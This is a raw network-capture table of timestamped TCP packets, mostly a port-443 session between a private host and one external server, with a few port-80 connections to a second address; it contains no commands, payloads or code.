Aug 19, 2024 06:06:03.017532110 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.017548084 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.031681061 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.031706095 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.031745911 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.031757116 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.031790972 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.031806946 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.047329903 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.047353029 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.047424078 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.047437906 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.047864914 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.059609890 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.059628010 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.059689045 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.059705019 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.060028076 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.068722963 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.068741083 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.071969986 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.071984053 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.072072983 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.078706026 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.078722954 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.078821898 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.078830004 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.080648899 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.086709976 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.086724997 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.087862968 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.087872028 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.087943077 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.096383095 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.096400023 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.099670887 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.099680901 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.099749088 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.106257915 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.106275082 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.106429100 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.106429100 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.106437922 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.108450890 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.115051985 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.115067005 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.116450071 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.116465092 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.124453068 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.133656979 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.133675098 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.134726048 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.134740114 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.134860039 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.146891117 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.146905899 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.148454905 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.148468018 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.151947975 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.157644987 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.157660007 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.157763004 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.157763004 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.157773018 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.160567045 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.165982962 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.165997982 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.166100979 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.166110039 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.167615891 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.175739050 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.175754070 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.175925016 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.175934076 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.176019907 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.183662891 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.183682919 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.183861971 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.183876038 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.183933020 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.192909956 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.192924023 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.195354939 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.195363998 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.195431948 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.204191923 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.204210043 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.204296112 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.204296112 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.204305887 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.204534054 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.229784012 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.229799032 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.229901075 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.229912043 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.230468988 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.235714912 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.235729933 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.236449003 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.236458063 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.240528107 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.249876976 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.249892950 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.249988079 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.249996901 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.250101089 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.259773970 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.259788036 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.260451078 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.260458946 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.264586926 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.264655113 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.264672041 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.264755964 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.264755964 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.264765978 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.265500069 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.278198004 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.278213024 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.278363943 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.278374910 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.278420925 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.281821012 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.281836033 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.281943083 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.281959057 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.282071114 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.306585073 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.306600094 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.306682110 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.306682110 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.306690931 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.308598042 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.319055080 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.319070101 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.319137096 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.319144964 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.319205999 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.329952002 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.329968929 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.330025911 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.330034018 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.330079079 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.330111027 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.348220110 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.348237991 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.348366976 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.348377943 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.350295067 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.350313902 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.350330114 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.350343943 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.350368023 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.350917101 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.358175039 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.358198881 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.358274937 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.358274937 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.358283997 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.360452890 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.367176056 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.367192984 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.368983030 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.368993998 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.369081020 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.370695114 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.370711088 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.370824099 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.370832920 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.371165037 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.395354033 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.395370007 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.395509958 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.395523071 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.396449089 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.398099899 CEST	80	49862	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:03.404448986 CEST	49862	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:03.408776999 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.408834934 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.408940077 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.408940077 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.408951044 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.412446022 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.419403076 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.419446945 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.419487000 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.419495106 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.419521093 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.419604063 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.437371016 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.437414885 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.437455893 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.437463999 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.437490940 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.439666033 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.439836979 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.439879894 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.439918995 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.439927101 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.439949989 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.440006018 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.456075907 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.456120968 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.456223011 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.456223011 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.456233025 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.456331015 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.456372023 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.456382036 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.456413984 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.456423998 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.456448078 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.457746983 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.470639944 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.470681906 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.470726013 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.470736980 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.470787048 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.470787048 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.477685928 CEST	49862	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:03.482770920 CEST	80	49862	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:03.484529018 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.484570026 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.484574080 CEST	49862	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:03.484611988 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.484627008 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.484657049 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.488452911 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.493788958 CEST	49863	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:03.496849060 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.496891022 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.496931076 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.496939898 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.496958971 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.496995926 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.498559952 CEST	80	49863	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:03.498641968 CEST	49863	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:03.500884056 CEST	49863	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:06:03.505697966 CEST	80	49863	185.215.113.16	192.168.2.4
Aug 19, 2024 06:06:03.508239031 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.508280039 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.508328915 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.508337975 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.508384943 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.508384943 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.526324987 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.526366949 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.526420116 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.526427984 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.526458025 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.526537895 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.528994083 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.529048920 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.529088974 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.529095888 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.529124022 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.529189110 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.545312881 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.545416117 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.545460939 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.545469999 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.545499086 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.545664072 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.546253920 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.546300888 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.546340942 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.546348095 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.546374083 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.546705008 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.559786081 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.559827089 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.559864998 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.559874058 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.559904099 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.560039043 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.573533058 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.573575020 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.573671103 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.573671103 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.573681116 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.573755980 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.585995913 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.586040974 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.586096048 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.586105108 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.586136103 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.586196899 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.597084999 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.597126961 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.597167969 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.597176075 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.597203970 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.597261906 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.617995024 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.618053913 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.618094921 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.618103981 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.618134022 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.618144989 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.618149042 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.618176937 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.618213892 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.618223906 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.618268013 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.618275881 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.618288994 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.618333101 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.634254932 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.634296894 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.634397030 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.634397030 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.634406090 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.634510994 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.635257006 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.635297060 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.635338068 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.635345936 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.635379076 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.635456085 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.648562908 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.648608923 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.648652077 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.648679972 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.648715019 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.649029016 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.662483931 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.662528038 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.662579060 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.662589073 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.662662983 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.662739992 CEST	49859	443	192.168.2.4	195.201.118.191
Aug 19, 2024 06:06:03.675054073 CEST	443	49859	195.201.118.191	192.168.2.4
Aug 19, 2024 06:06:03.675095081 CEST	443	49859	195.201.118.191	192.168.2.4
